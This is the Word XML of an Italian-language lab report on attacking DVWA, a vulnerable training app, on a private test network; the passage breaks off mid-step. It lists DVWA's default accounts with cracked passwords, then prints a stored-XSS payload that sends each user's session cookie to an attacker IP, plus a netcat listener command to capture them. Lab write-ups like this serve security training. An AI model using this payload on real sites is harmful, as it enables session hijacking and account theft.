    <w:p w14:paraId="4AF9DC3D" w14:textId="7A5E41B0" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00AF5917" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Le password in chiaro sono:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4814"/>
        <w:gridCol w:w="4814"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w14:paraId="49B278E8" w14:textId="77777777" w:rsidTr="002C0453">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6E5A766E" w14:textId="554FB3BD" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00AF5917" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1F7E41E4" w14:textId="2D5A7FF5" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00AF5917" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Password decrittata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w14:paraId="16BE8DA3" w14:textId="77777777" w:rsidTr="002C0453">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5ED53525" w14:textId="448A7824" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3464B69E" w14:textId="7F4DAAB5" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w14:paraId="375E6DEC" w14:textId="77777777" w:rsidTr="002C0453">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="274C6F92" w14:textId="44B9FFE8" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>smithy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3A610736" w14:textId="52D8700F" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w14:paraId="4CDB4A8C" w14:textId="77777777" w:rsidTr="002C0453">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3CABBF44" w14:textId="42045F40" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>gordonb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="23D566F3" w14:textId="3BD3F6AF" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>abc123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w14:paraId="783BA1B4" w14:textId="77777777" w:rsidTr="002C0453">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="13C7C7A3" w14:textId="6CBC2EE7" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>pablo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="72426578" w14:textId="03E8C699" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>letmein</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w14:paraId="50A5E756" w14:textId="77777777" w:rsidTr="002C0453">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="22B77300" w14:textId="1E0BE79B" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="72C37D2C" w14:textId="487FC851" w:rsidR="00AF5917" w:rsidRPr="00B34E8B" w:rsidRDefault="00433E81" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>charley</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6250E9B2" w14:textId="715DA001" w:rsidR="002C0453" w:rsidRDefault="002C0453" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD03E1A" w14:textId="2614B475" w:rsidR="00797EE2" w:rsidRDefault="00797EE2" w:rsidP="00797EE2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="035BB364" w14:textId="03F8A902" w:rsidR="00797EE2" w:rsidRDefault="00680AFA" w:rsidP="00680AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00481114">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lo step successivo</w:t>
      </w:r>
      <w:r w:rsidR="00481114">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, una volta ottenute le credenziali di tutti gli utenti, sarà quello di rubare i loro cookies di sessione attraverso un attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00481114">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00481114">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75786127" w14:textId="73719ED7" w:rsidR="00481114" w:rsidRDefault="00B94F1F" w:rsidP="00680AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Questo attacco andrà a recuperare per ogni </w:t>
      </w:r>
      <w:r w:rsidR="00B71704">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">utente il suo cookie di sessione, attraverso lo script </w:t>
      </w:r>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;new Image().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="http://192.168.50.100/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ila.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?"+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; &lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B71704" w:rsidRPr="00B71704">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B71704">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E79E3B" w14:textId="2204D4D3" w:rsidR="00B71704" w:rsidRDefault="00E616E3" w:rsidP="00680AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attraverso questo attacco non sarà indispensabile riavviare </w:t>
      </w:r>
      <w:r w:rsidR="005F0F56">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>il comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ogni qualvolta si fa il login con un altro utente, ma automaticamente verrà rilevato il nuovo cookie di sessione per gli altri utenti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336DB090" w14:textId="3BEFB2C2" w:rsidR="0058656E" w:rsidRPr="00481114" w:rsidRDefault="0058656E" w:rsidP="00680AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A99603" wp14:editId="4383F21D">
            <wp:extent cx="6120130" cy="272796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6120130" cy="2727960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EAE18" w14:textId="53DAA746" w:rsidR="00334928" w:rsidRDefault="0058656E" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Il cookie di sessione non verrà stampato a schermo attraverso questo </w:t>
      </w:r>
      <w:r w:rsidR="003A203C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comando; pertanto,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> andremo ad eseguirlo con l’aiuto del tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NETCAT, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>che registrerà e stamperà sul terminale dei cookie di sessione differenti per ogni utente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F33F3A4" w14:textId="0A0C4D65" w:rsidR="007614C5" w:rsidRPr="007614C5" w:rsidRDefault="000903DF" w:rsidP="007614C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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3A270E">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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D564F86" w14:textId="26738762" w:rsidR="00646D03" w:rsidRDefault="007614C5" w:rsidP="003A270E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007614C5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> è uno </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tool già preinstallato in Kali Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="007614C5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a riga di comando</w:t>
      </w:r>
      <w:r w:rsidR="007A2A52">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. È definito il “coltellino svizzero delle rete TCP/IP”, in quanto ha tantissime funzionalità, tra cui anche quella di fare diagnosi di problemi che mettono a rischio le funzionalità di una rete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED40E9B" w14:textId="3570FFB7" w:rsidR="00F912F9" w:rsidRDefault="00646D03" w:rsidP="003A270E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Per </w:t>
      </w:r>
      <w:r w:rsidR="007614C5" w:rsidRPr="007614C5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lo scambio di dati, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007614C5" w:rsidRPr="007614C5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007614C5" w:rsidRPr="007614C5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizza i protocolli di rete TCP/IP e UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5033BC51" w14:textId="77777777" w:rsidR="00F912F9" w:rsidRDefault="00F912F9" w:rsidP="003A270E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1686D3" w14:textId="73733FB0" w:rsidR="007A2A52" w:rsidRDefault="007A2A52" w:rsidP="003A270E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In questo caso verrà utilizzato per trasmettere i dati (i cookie di sessione in questo caso) della macchina target alla macchina attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62DE0E" w14:textId="1501C8F3" w:rsidR="003A270E" w:rsidRPr="00E02A28" w:rsidRDefault="003A270E" w:rsidP="003A270E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Il tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> verrà utilizzato con il comando “-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” che metterà in ascolto la porta 80 (porta di default per l’HTTP)</w:t>
      </w:r>
      <w:r w:rsidR="00AB6B0C" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D000D8C" w14:textId="694D0610" w:rsidR="00B34E8B" w:rsidRPr="00E02A28" w:rsidRDefault="00AB6B0C" w:rsidP="0010442D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dopo aver digitato da terminale, quindi, il comando “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80”</w:t>
      </w:r>
      <w:r w:rsidR="00AE502D" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, andremo </w:t>
      </w:r>
      <w:r w:rsidR="0010442D" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a ripetere i passaggi sopra citati sulla DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A62034" w14:textId="77777777" w:rsidR="004128B4" w:rsidRPr="00E02A28" w:rsidRDefault="0010442D" w:rsidP="0010442D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Per essere più precisi</w:t>
      </w:r>
      <w:r w:rsidR="004128B4" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E241F03" w14:textId="2F4C8371" w:rsidR="004128B4" w:rsidRPr="00E02A28" w:rsidRDefault="004128B4" w:rsidP="004128B4">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aprire il browser Firefox e collegarsi alla pagina 192.168.50.101</w:t>
      </w:r>
      <w:r w:rsidR="00385561" w:rsidRPr="00E02A28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ed entrare </w:t>
      </w:r>
